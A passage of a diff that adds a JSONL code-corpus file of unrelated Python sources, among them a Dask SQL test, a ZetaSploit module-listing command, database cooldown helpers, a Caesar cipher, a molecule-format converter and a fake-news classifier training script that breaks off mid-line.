diff --git "a/2870.jsonl" "b/2870.jsonl"
new file mode 100644--- /dev/null
+++ "b/2870.jsonl"
@@ -0,0 +1,750 @@
+{"seq_id":"109641719","text":"from pandas.testing import assert_frame_equal\n\nfrom tests.integration.fixtures import DaskTestCase\n\n\nclass FilterTestCase(DaskTestCase):\n def test_filter(self):\n df = self.c.sql(\"SELECT * FROM df WHERE a < 2\")\n df = df.compute()\n\n expected_df = self.df[self.df[\"a\"] < 2]\n assert_frame_equal(df, expected_df)\n\n def test_filter_complicated(self):\n df = self.c.sql(\"SELECT * FROM df WHERE a < 3 AND (b > 1 AND b < 3)\")\n df = df.compute()\n\n expected_df = self.df[\n ((self.df[\"a\"] < 3) & ((self.df[\"b\"] > 1) & (self.df[\"b\"] < 3)))\n ]\n assert_frame_equal(\n df, expected_df,\n )\n","sub_path":"tests/integration/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215788712","text":"#!/usr/bin/env python3\n\n#\n# MIT License\n#\n# Copyright (c) 2020-2021 EntySec\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport os\n\nfrom core.badges import badges\nfrom core.storage import storage\nfrom core.modules import modules\nfrom core.formatter import formatter\n\nclass ZetaSploitCommand:\n def __init__(self):\n self.badges = badges()\n self.storage = storage()\n self.modules = modules()\n self.formatter = formatter()\n\n self.details = {\n 'Category': \"core\",\n 'Name': \"show\",\n 'Description': \"Show specified information.\",\n 'Usage': \"show \",\n 'ArgsCount': 1,\n 'NeedsArgs': True,\n 'Args': list()\n }\n\n def show_plugins(self):\n plugins = self.storage.get(\"plugins\")\n plugins_data = list()\n number = 0\n headers = (\"Number\", \"Name\", \"Database\", \"Description\")\n for database in plugins.keys():\n plugins = plugins[database]\n for plugin in sorted(plugins.keys()):\n plugins_data.append((number, plugin, database, plugins[plugin]['Description']))\n number += 1\n self.badges.output_empty(\"\")\n self.formatter.format_table(\"Plugins\", headers, *plugins_data)\n self.badges.output_empty(\"\")\n \n def show_modules(self, information):\n modules = self.storage.get(\"modules\")\n modules_data = list()\n number = 0\n headers = (\"Number\", \"Name\", \"Database\", \"Risk\", \"Description\")\n for database in modules.keys():\n modules = modules[database][information]\n for platform in sorted(modules.keys()):\n for module in sorted(modules[platform].keys()):\n full_name = self.modules.get_full_name(information, platform, module)\n modules_data.append((number, full_name, database, modules[platform][module]['Risk'], modules[platform][module]['Description']))\n number += 1\n self.badges.output_empty(\"\")\n self.formatter.format_table(information.title() + \" Modules\", headers, *modules_data)\n self.badges.output_empty(\"\")\n \n def show_options(self):\n current_module = self.modules.get_current_module_object()\n options_data = list()\n headers = (\"Option\", \"Value\", \"Required\", \"Description\")\n options = current_module.options\n for option in sorted(options.keys()):\n value, required = options[option]['Value'], options[option]['Required']\n if required:\n required = \"yes\"\n else:\n required = \"no\"\n if not value and value != 0:\n value = \"\"\n options_data.append((option, value, required, options[option]['Description']))\n self.badges.output_empty(\"\")\n self.formatter.format_table(\"Module Options\", headers, *options_data)\n self.badges.output_empty(\"\")\n \n def print_usage(self, informations, plugins, options):\n if informations or plugins or options:\n usage = \"Informations: \"\n for information in informations:\n usage += information + \", \"\n if plugins:\n usage += \"plugins, \"\n if options:\n usage += \"options\"\n else:\n usage = usage[:-2]\n self.badges.output_information(usage)\n else:\n self.badges.output_warning(\"No informations available!\")\n \n def run(self):\n information = self.details['Args'][0]\n \n if self.modules.check_current_module():\n current_module = self.modules.get_current_module_object()\n \n options = False\n if hasattr(current_module, \"options\"):\n options = True\n else:\n options = False\n \n modules = self.storage.get(\"modules\")\n plugins = self.storage.get(\"plugins\")\n \n informations = list()\n if modules:\n for database in sorted(modules.keys()):\n for category in sorted(modules[database].keys()):\n informations.append(category)\n \n if plugins:\n if information == \"plugins\":\n self.show_plugins()\n return\n if options:\n if information == \"options\":\n self.show_options()\n return\n if information in informations:\n self.show_modules(information)\n else:\n self.print_usage(informations, plugins, options)\n","sub_path":"core/commands/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"533724116","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"GEMR2D\")\n\nprocess.load(\"EventFilter.GEMRawToDigi.GEMSQLiteCabling_cfi\")\nprocess.GEMCabling.connect = 'sqlite_file:GEMEMap.db'\nprocess.load(\"EventFilter.GEMRawToDigi.gemUnpacker_cfi\")\nprocess.gemunpacker.InputLabel = cms.InputTag(\"TBData\",\"GEMTBData\")\n\n\n# set maxevents; -1 -> take all\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1))\n\nprocess.source = cms.Source (\"PoolSource\",fileNames = cms.untracked.vstring( 'file:myOutputFile.root'))\n#process.source = cms.Source (\"NewEventStreamFileReader\",fileNames = cms.untracked.vstring( 'file:myOutputFile.root'))\n\n\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n debugModules = cms.untracked.vstring('gemunpacker'),\n destinations = cms.untracked.vstring('cout'),\n cout = cms.untracked.PSet( threshold = cms.untracked.string('WARNING'))\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('file:outPut.root'),\n outputCommands = cms.untracked.vstring(\"keep *\")\n)\n\nprocess.p = cms.Path(process.gemunpacker)\nprocess.ep = cms.EndPath(process.out)\n","sub_path":"EventFilter/GEMRawToDigi/GEMRawToDigi/test/r2d.py","file_name":"r2d.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"213077159","text":"from datetime import timedelta, datetime\nfrom operator import itemgetter\nfrom typing import Iterator, Any, List, Optional, Dict, Tuple\n\nimport pymongo\nfrom dataclasses import dataclass\n\nfrom game.core.localizer import localize as _\nfrom game.data import action_constraints\nfrom game.database import db\nfrom game.entities import Entity\nfrom game.player import Player\nfrom game.repo_loli import Loli\nfrom game.time_utils import current_datetime\n\n\ndef set_cooldown(entity: Entity, reason: str, duration: timedelta, **conditions: Any):\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n db[collection].update(\n {'_id': entity.id},\n {'$push': {\n 'cooldowns': {\n 'reason': reason,\n 'expires_at': current_datetime() + duration,\n 'conditions': conditions\n }\n }}\n )\n\n\ndef remove_cooldown(entity: Entity, reason: str = None):\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n condition: Dict[str, Any] = {'expires_at': {'$gt': current_datetime()}}\n if reason:\n condition['reason'] = reason\n\n db[collection].update(\n {'_id': entity.id},\n {'$pull': {\n 'cooldowns': condition\n }}\n )\n\n\n@dataclass(frozen=True)\nclass Cooldown:\n reason: str\n expires_at: datetime\n\n\ndef get_cooldowns(entity: Entity, **conditions: Any) -> List[Cooldown]:\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n additional_conditions = {'cooldowns.conditions.' + field: value for field, value in conditions.items()}\n cooldowns = db[collection].aggregate([\n {'$match': {'_id': entity.id}},\n {'$unwind': '$cooldowns'},\n {'$match': {'cooldowns.expires_at': {'$gt': current_datetime()}, **additional_conditions}},\n {'$sort': {'cooldowns.expires_at': pymongo.DESCENDING}},\n {'$project': {'reason': '$cooldowns.reason', 'expires_at': '$cooldowns.expires_at'}}\n ])\n\n return [Cooldown(reason=cooldown['reason'], expires_at=cooldown['expires_at']) for cooldown in cooldowns]\n\n\ndef get_active_cooldown(action: str, **params) -> Optional[str]:\n cooldowns = get_active_cooldowns(action, **params)\n earliest_cooldown = next(iter(cooldowns), None)\n if not earliest_cooldown:\n return None\n\n cooldown, end_date = earliest_cooldown\n\n return _('action.{}.fail'.format(action)) + ' ' + _('cooldown.{}.fail'.format(cooldown))\n\n\ndef get_active_cooldowns(action: str, **params) -> Iterator[Tuple[str, datetime]]:\n try:\n expected_params = action_constraints[action]['params']\n except KeyError:\n raise StopIteration\n\n active_cooldowns = {}\n for param_name in expected_params:\n entity = params.get(param_name, None)\n blocking_cooldowns = expected_params[param_name]\n if not entity and not blocking_cooldowns:\n continue\n for cooldown in get_cooldowns(entity):\n if cooldown.reason in blocking_cooldowns:\n active_cooldowns[param_name + '.' + cooldown.reason] = cooldown.expires_at\n\n yield from sorted(active_cooldowns.items(), key=itemgetter(1), reverse=True)\n\n\ndef has_cooldown(entity: Entity, reason: str, **conditions: Any) -> bool:\n cooldowns = get_cooldowns(entity, **conditions)\n return any(cooldown.reason == reason for cooldown in cooldowns)\n","sub_path":"game/cooldowns.py","file_name":"cooldowns.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"599459937","text":"# from django.shortcuts import render\nfrom django.http import HttpResponse\n# from django.views.generic.base import TemplateView\nfrom django.template.response import TemplateResponse\n\ndef home(request):\n html='appointment.home'\n t = TemplateResponse(request, 'base.html', {})\n t.template_name = 'index.html'\n t.render();\n # return HttpResponse(html)\n return t\n","sub_path":"appointment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"111688704","text":"#encoding utf-8\r\n#\r\n# model.topic\r\n# by wooght 2017-11\r\n\r\nimport model.Db as T\r\n\r\ndef all():\r\n s = T.select([T.topic.c.body,T.topic.c.id]).where(T.topic.c.id>21441)\r\n r = T.conn.execute(s)\r\n return r.fetchall()\r\n\r\ndef one(id):\r\n s = T.select([T.topic.c.body,T.topic.c.id]).where(T.topic.c.id==id)\r\n r = T.conn.execute(s)\r\n r_str = r.fetchall()[0]\r\n return r_str\r\n\r\ndef up(id,arr):\r\n u = T.topic.update().where(T.topic.c.id==id).values(arr)\r\n r = T.conn.execute(u)\r\n if(r.rowcount>0):\r\n return True\r\n else:\r\n return False\r\n\r\n#查company codeid\r\ndef s_company_id(str):\r\n s = T.select([T.listed_company.c.codeid]).where(T.listed_company.c.name.like(str))\r\n r = T.conn.execute(s)\r\n result = r.fetchall()\r\n return result[0][0]\r\n\r\n#查plate plateid\r\ndef s_plate_id(str):\r\n s = T.select([T.listed_plate.c.plateid]).where(T.listed_plate.c.name.like(str))\r\n r = T.conn.execute(s)\r\n result = r.fetchone()\r\n return result[0]\r\n","sub_path":"caijing_scrapy/model/topic.py","file_name":"topic.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"145624984","text":"def is_letter(a):\n a = str(a)\n a = ord(a)\n a = bool(64 < a < 91 or 96 < a < 123)\n return a\n\n\ndef roteer_letter(a, b):\n a = ord(a)\n if a < 91:\n x = 1\n else:\n x = 0\n if (a + b > 90 and x == 1) or a + b > 122:\n a -= 26 * ((b // 26.0001) + 1)\n return chr(int(a + b))\n\n\ndef versleutel(a, b):\n c = ''\n for i in a:\n if is_letter(i):\n c += roteer_letter(i, b)\n else:\n c += i\n return c\n","sub_path":"08 - Functies/Ave Caesar.py","file_name":"Ave Caesar.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"568055320","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\n\ntime1 = time.time()\n\n#basic crawling function\ndef crawling(link):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n r = requests.get(link, headers=headers, timeout=20)\n html_data = BeautifulSoup(r.text, 'lxml')\n return html_data\n except Exception as e:\n print('该地址下载失败: ', url)\n print(e)\nfor i in range(1,10):\n main_site_links='https://keikolynn.com/category/style/shopping-guides/page/'+str(i)+'/'\n main_site_data = crawling(main_site_links)\n print(main_site_data)\n","sub_path":"keikolynn.py","file_name":"keikolynn.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"166730018","text":"# Converts ligand SMILES strings into PDB files\n# reads from smiles.csv and outputs to the ligand_pdb directory.\n\nimport csv\nimport mechanize\nimport os\nfrom pyquery import PyQuery\nimport ssl\nimport urllib.request\n\nHTML_SUCCESS = 200\nURL_TEMPLATE = \"http://cactus.nci.nih.gov{}\"\nFILE_TEMPLATE = \"{}/{}.pdb\"\nURL = URL_TEMPLATE.format('/translate')\nOUTDIR = 'ligand_pdb'\nDATA_FILE = 'data.txt'\n\nssl._create_default_https_context = ssl._create_unverified_context\nbr = mechanize.Browser()\nbr.set_handle_robots(False)\n\nif not os.path.exists(OUTDIR):\n os.makedirs(OUTDIR)\n\nwith open(DATA_FILE, 'r', encoding='utf-8') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n rows = list(reader)[1:]\n data = set(( (row[1], row[2]) for row in rows ))\n progress = 0\n for common, smiles in data:\n progress += 1\n print(\"Converting compound {}/{}: {}\".format(progress, len(data), common))\n print(' Opening connection')\n br.open(URL)\n br.select_form(name='form')\n br['smiles'] = smiles\n br['format'] = ['pdb']\n br['astyle'] = ['aromatic']\n br['dim'] = ['3D']\n print(' Submitting form')\n res = br.submit()\n if res.getcode() == HTML_SUCCESS:\n print(' Downloading PDB file')\n content = res.read()\n pq = PyQuery(content)\n link = pq('a:first').attr('href')\n file_url = URL_TEMPLATE.format(link)\n filename = FILE_TEMPLATE.format(OUTDIR, common)\n urllib.request.urlretrieve(file_url, filename)\n print(\" Success! File saved to {}\".format(filename))\n else:\n print(\" Invalid form response: {}\".format(res.getcode()))\n print()\n","sub_path":"Preprocessing Scripts/ligand_smiles_to_pdb.py","file_name":"ligand_smiles_to_pdb.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"398776416","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-intel/egg/doubanfm/controller/lrc_controller.py\n# Compiled at: 2016-06-22 17:23:26\nimport logging\nfrom doubanfm.views import lrc_view\nfrom doubanfm.controller.main_controller import MainController\nlogger = logging.getLogger('doubanfm')\n\nclass LrcController(MainController):\n \"\"\"\n 按键控制\n \"\"\"\n\n def __init__(self, player, data, queue):\n self.player = player\n self.data = data\n self.keys = data.keys\n self.quit = False\n self.rate_times = 0\n self.queue = queue\n self._bind_view()\n\n def _bind_view(self):\n self.view = lrc_view.Lrc(self.data)\n\n def _watchdog_queue(self):\n u\"\"\"\n 从queue里取出字符执行命令\n \"\"\"\n while not self.quit:\n k = self.queue.get()\n if k == self.keys['QUIT']:\n self.quit = True\n self.switch_queue.put('main')\n elif k == self.keys['BYE']:\n self.data.bye()\n self.player.start_queue(self)\n elif k == self.keys['LOOP']:\n self.set_loop()\n elif k == self.keys['RATE']:\n self.set_rate()\n elif k == self.keys['OPENURL']:\n self.set_url()\n elif k == self.keys['HIGH']:\n self.set_high()\n elif k == self.keys['PAUSE']:\n self.set_pause()\n elif k == self.keys['NEXT']:\n self.player.next()\n elif k == '-' or k == '_':\n self.set_volume(-1)\n elif k == '+' or k == '=':\n self.set_volume(1)\n elif k == self.keys['MUTE']:\n self.set_mute()\n elif k in ('1', '2', '3', '4'):\n self.set_theme(k)\n elif k == self.keys['UP'] or k == 'B':\n self.up()\n elif k == self.keys['DOWN'] or k == 'A':\n self.down()","sub_path":"pycfiles/douban.fm-0.4.15-py2.7/lrc_controller.py","file_name":"lrc_controller.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"93294209","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass ModifyQuotaDetails(object):\n\n def __init__(self):\n self._quota_amount = None\n self._quota_dimension = None\n self._role = None\n\n @property\n def quota_amount(self):\n return self._quota_amount\n\n @quota_amount.setter\n def quota_amount(self, value):\n self._quota_amount = value\n @property\n def quota_dimension(self):\n return self._quota_dimension\n\n @quota_dimension.setter\n def quota_dimension(self, value):\n self._quota_dimension = value\n @property\n def role(self):\n return self._role\n\n @role.setter\n def role(self, value):\n self._role = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.quota_amount:\n if hasattr(self.quota_amount, 'to_alipay_dict'):\n params['quota_amount'] = self.quota_amount.to_alipay_dict()\n else:\n params['quota_amount'] = self.quota_amount\n if self.quota_dimension:\n if hasattr(self.quota_dimension, 'to_alipay_dict'):\n params['quota_dimension'] = self.quota_dimension.to_alipay_dict()\n else:\n params['quota_dimension'] = self.quota_dimension\n if self.role:\n if hasattr(self.role, 'to_alipay_dict'):\n params['role'] = self.role.to_alipay_dict()\n else:\n params['role'] = self.role\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = ModifyQuotaDetails()\n if 'quota_amount' in d:\n o.quota_amount = d['quota_amount']\n if 'quota_dimension' in d:\n o.quota_dimension = d['quota_dimension']\n if 'role' in d:\n o.role = d['role']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/ModifyQuotaDetails.py","file_name":"ModifyQuotaDetails.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"84317283","text":"#Utils\nimport numpy as np\n\nclass DotDict(dict):\n # dot.notation access to dictionary attributes\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n\ndef print_data(name, data, boolean=False):\n if boolean is True:\n np.savetxt(name, data, fmt=\"%1d\", delimiter=\" \")\n else:\n np.savetxt(name, data, fmt=\"%9.2e\", delimiter=\" \")\n\ndef cmap_to_cscale(cmap, pl_entries):\n h = 1.0/(pl_entries-1)\n pl_colorscale = []\n\n for k in range(pl_entries):\n C = list(map(np.uint8, np.array(cmap(k*h)[:3])*255))\n pl_colorscale.append([k*h, 'rgb'+str((C[0], C[1], C[2]))])\n\n return pl_colorscale\n\nclass MagicMethodWrapper(type):\n\n def __init__(cls, name, bases, dct):\n def make_proxy(name):\n def proxy(self, *args):\n return getattr(self._obj, name)\n return proxy\n type.__init__(cls, name, bases, dct)\n if cls.__wraps__:\n ignore = set(\"__%s__\" % n for n in cls.__ignore__.split())\n for name in dir(cls.__wraps__):\n if name.startswith(\"__\"):\n if name not in ignore and name not in dct:\n #attr = getattr(cls.__wraps__, name)\n setattr(cls, name, property(make_proxy(name)))\n\n\nclass Wrapper(object, metaclass = MagicMethodWrapper):\n\n __wraps__ = None\n __ignore__ = \"class mro new init setattr getattr getattribute dir\"\n\n def __init__(self, obj):\n if self.__wraps__ is None:\n raise TypeError(\"base class Wrapper may not be instansiated\")\n elif isinstance(obj, self.__wraps__):\n self._obj = obj\n else:\n raise ValueError(\"wrapped object must be of {}\".format(self.__wraps__))\n\n def __getattr__(self, name):\n return getattr(self._obj, name)\n\n\"\"\"\n# class Wrapper use\nfrom utils import Wrapper\nimport numpy as np\n\nclass ArrayWrapper(Wrapper):\n __wraps__ = np.ndarray\n def salute(self):\n print('hola')\n\nnumpy_array = np.random.rand(5,6)\nwa = ArrayWrapper(numpy_array)\n\"\"\"\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"569279628","text":"\nimport marshal\nimport os\nimport time\nimport ZEO.zrpc.connection\n\n\nbase = '/tmp'\n\npath = None\n\ndef log(connection, action=None):\n \"\"\"Enable, disable, or get the path of the zeo input log\n \"\"\"\n global path\n\n if action is None:\n connection.write(path and (\"%r\\n\" % path) or 'disabled')\n return\n\n if action == 'disable':\n if path is None:\n connection.write(\"Already disabled\\n\")\n else:\n connection.write(\"disabled %r\\n\" % path)\n del ZEO.zrpc.connection.ManagedServerConnection.message_input\n path = None\n return\n\n if action != 'enable':\n connection.write(\"Unknown action: %r\\n\" % action)\n\n if path:\n log(connection, 'disable')\n\n _path = os.path.join(base, time.strftime(\"%y%m%d%H%M%S\",\n time.gmtime(time.time())))\n\n log_file = open(_path, 'w')\n path = _path\n base_message_input = ZEO.zrpc.connection.Connection.message_input\n dump = marshal.dump\n timetime = time.time\n\n def message_input(self, message):\n dump((id(self), timetime(), message), log_file)\n base_message_input(self, message)\n\n ZEO.zrpc.connection.ManagedServerConnection.message_input = message_input\n connection.write(\"enabled %r\\n\" % path)\n","sub_path":"zc.zeoinputlog/branches/replay/src/zc/zeoinputlog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"521478900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: rahulmishra\n\"\"\"\nimport os, time, pickle\nimport numpy as np\nimport tensorflow as tf\nimport datetime\nfrom data_helpers import Dataset\nimport data_helpers\nfrom model import SADHA\n\nimport argparse\n#from tensorflow import reset_default_graph\nargs = argparse.ArgumentParser()\n\nconfig, unparsed = args.parse_known_args()\n\n\n\n\n#reset_default_graph()\n# Data loading params\nargs.add_argument(\"n_class\", type=int, default=2)\nargs.add_argument(\"-dataset\", default='politi')\n# Model Hyperparameters\nargs.add_argument(\"embedding_dim\", type=int, default=100)\nargs.add_argument(\"hidden_size\", type=int, default=100)\nargs.add_argument('max_sen_len',type=int, default=500)\nargs.add_argument('max_doc_len',type=int,default= 40)\nargs.add_argument(\"lr\",type=float, default=0.001)\n\n# Training parameters\nargs.add_argument(\"batch_size\",type=int, default=100)\nargs.add_argument(\"num_epochs\", type=int,default=10)\nargs.add_argument(\"evaluate_every\",type=int, default=50)\n\n# Misc Parameters\nargs.add_argument(\"allow_soft_placement\",type= bool,default= True)\nargs.add_argument(\"log_device_placement\",type= bool, default=False)\n\nconfig1, unparsed = args.parse_known_args()#import sys\n#FLAGS(sys.argv)\n#FLAGS._parse_flags()\nprint(\"\\nParameters:\")\n#for attr, value in sorted(FLAGS.__flags.items()):\n# print(\"{}={}\".format(attr.upper(), value))\n#print(\"\")\n\n\n# Load data\nprint(\"Loading data...\")\n\n\ndata_dir = \"/home/prosjekt/deepnews/fakenews-data/snopes_pickles/\"\nwith open(data_dir+'docVectorCollection.pickle', 'rb') as handle:\n doc_data = pickle.load(handle)\nwith open(data_dir+'labelVectorCollection.pickle', 'rb') as handle:\n label_data = pickle.load(handle)\nwith open(data_dir+'claimVectorCollection.pickle', 'rb') as handle:\n claim_data = pickle.load(handle)\nwith open(data_dir+'SpeakerVectorCollection.pickle', 'rb') as handle:\n speaker_data = pickle.load(handle)\nwith open(data_dir+'DocSourceCollection.pickle', 'rb') as handle:\n source_doc_data = pickle.load(handle)\n\n\ntrain_doc = doc_data[:int((len(doc_data)+1)*.80)]\ntrain_label = label_data[:int((len(doc_data)+1)*.80)]\ntrain_claim = claim_data[:int((len(doc_data)+1)*.80)]\ntrain_speaker = speaker_data[:int((len(doc_data)+1)*.80)]\ntrain_source_doc = source_doc_data[:int((len(doc_data)+1)*.80)]\n\ntest_doc = doc_data[int(len(train_doc)*.80+1):]\ntest_label = label_data[int(len(train_doc)*.80+1):]\ntest_claim = claim_data[int(len(train_doc)*.80+1):]\ntest_speaker = speaker_data[int(len(train_doc)*.80+1):]\ntest_source_doc = source_doc_data[int(len(train_doc)*.80+1):]\n\n\nFtrain_doc = train_doc[:int((len(train_doc)+1)*.80)]\nFtrain_label = train_label[:int((len(train_doc)+1)*.80)]\nFtrain_claim = train_claim[:int((len(train_doc)+1)*.80)]\nFtrain_speaker = train_speaker[:int((len(train_doc)+1)*.80)]\nFtrain_source_doc = train_source_doc[:int((len(train_doc)+1)*.80)]\n\nval_doc = train_doc[int(len(train_doc)*.80+1):]\nval_label = train_label[int(len(train_doc)*.80+1):]\nval_claim = train_claim[int(len(train_doc)*.80+1):]\nval_speaker = train_speaker[int(len(train_doc)*.80+1):]\nval_source_doc = train_source_doc[int(len(train_doc)*.80+1):]\n\n#print(val_doc,val_label,val_claim,val_speaker,val_source_doc)\nall_d = Dataset(doc_data,label_data,claim_data,speaker_data,source_doc_data)\ntrainset = Dataset(Ftrain_doc,Ftrain_label,Ftrain_claim,Ftrain_speaker,Ftrain_source_doc)\ndevset = Dataset(val_doc,val_label,val_claim,val_speaker,val_source_doc)\ntestset = Dataset(test_doc,test_label,test_claim,test_speaker,test_source_doc)\nprint(devset.t_label[0])\n\nalldata = np.concatenate([trainset.t_docs, devset.t_docs, testset.t_docs], axis=0)\n#print(alldata)\nembeddingpath = '/home/prosjekt/deepnews/falseclaims-data/clean_data/glove.6B.100d.txt'\nembeddingfile, wordsdict = data_helpers.load_embedding(embeddingpath, alldata, config1.embedding_dim)\n#del alldata\nprint(\"Loading data finished...\")\n\nspkrdict, domdict = all_d.get_spkr_dom_dict()\ntrainbatches = trainset.batch_iter(spkrdict, domdict, wordsdict, config1.n_class, config1.batch_size,\n config1.num_epochs, config1.max_sen_len, config1.max_doc_len)\n#spkrdict, domdict = devset.get_spkr_dom_dict()\n\ndevset.genBatch(spkrdict, domdict, wordsdict, config1.batch_size,\n config1.max_sen_len, config1.max_doc_len, config1.n_class)\n#spkrdict, domdict = testset.get_spkr_dom_dict()\n\ntestset.genBatch(spkrdict, domdict, wordsdict, config1.batch_size,\n config1.max_sen_len, config1.max_doc_len, config1.n_class)\n\n\n#devbatches = devset.batch_iter(spkrdict, domdict, wordsdict, FLAGS.n_class, FLAGS.batch_size,\n# FLAGS.num_epochs, FLAGS.max_sen_len, FLAGS.max_doc_len)\n#testbatches = testset.batch_iter(spkrdict, domdict, wordsdict, FLAGS.n_class, FLAGS.batch_size,\n# FLAGS.num_epochs, FLAGS.max_sen_len, FLAGS.max_doc_len)\n\nwith tf.Graph().as_default():\n session_config = tf.ConfigProto(\n \n allow_soft_placement=config1.allow_soft_placement,\n log_device_placement=config1.log_device_placement\n )\n session_config.gpu_options.allow_growth = True\n session_config.gpu_options.allocator_type = 'BFC'\n\n# config = tf.ConfigProto(device_count = {'GPU': 1})\n sess = tf.Session(config=session_config)\n with sess.as_default():\n SADHA = SADHA(\n max_sen_len = config1.max_sen_len,\n max_doc_len = config1.max_doc_len,\n class_num = config1.n_class,\n embedding_file = embeddingfile,\n embedding_dim = config1.embedding_dim,\n hidden_size = config1.hidden_size,\n spkr_num = len(spkrdict),\n dom_num = len(domdict)\n )\n SADHA.build_model()\n # Define Training procedure\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n optimizer = tf.train.AdamOptimizer(config1.lr)\n grads_and_vars = optimizer.compute_gradients(SADHA.loss)\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)\n\n # Save dict\n timestamp = str(int(time.time()))\n checkpoint_dir = os.path.abspath(\"../checkpoints/\"+config1.dataset+\"/\"+timestamp)\n checkpoint_prefix = os.path.join(checkpoint_dir, \"model\")\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)\n with open(checkpoint_dir + \"/wordsdict.txt\", 'wb') as f:\n pickle.dump(wordsdict, f)\n with open(checkpoint_dir + \"/spkrdict.txt\", 'wb') as f:\n pickle.dump(spkrdict, f)\n with open(checkpoint_dir + \"/domdict.txt\", 'wb') as f:\n pickle.dump(domdict, f)\n\n sess.run(tf.global_variables_initializer())\n\n def train_step(batch):\n u, p, x, y, sen_len, doc_len = zip(*batch)\n feed_dict = {\n SADHA.spkrid: u,\n SADHA.domid: p,\n SADHA.input_x: x,\n SADHA.input_y: y,\n SADHA.sen_len: sen_len,\n SADHA.doc_len: doc_len\n }\n _, step, loss, accuracy = sess.run(\n [train_op, global_step, SADHA.loss, SADHA.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n\n def predict_step(u, p, x, y, sen_len, doc_len, name=None):\n feed_dict = {\n SADHA.spkrid: u,\n SADHA.domid: p,\n SADHA.input_x: x,\n SADHA.input_y: y,\n SADHA.sen_len: 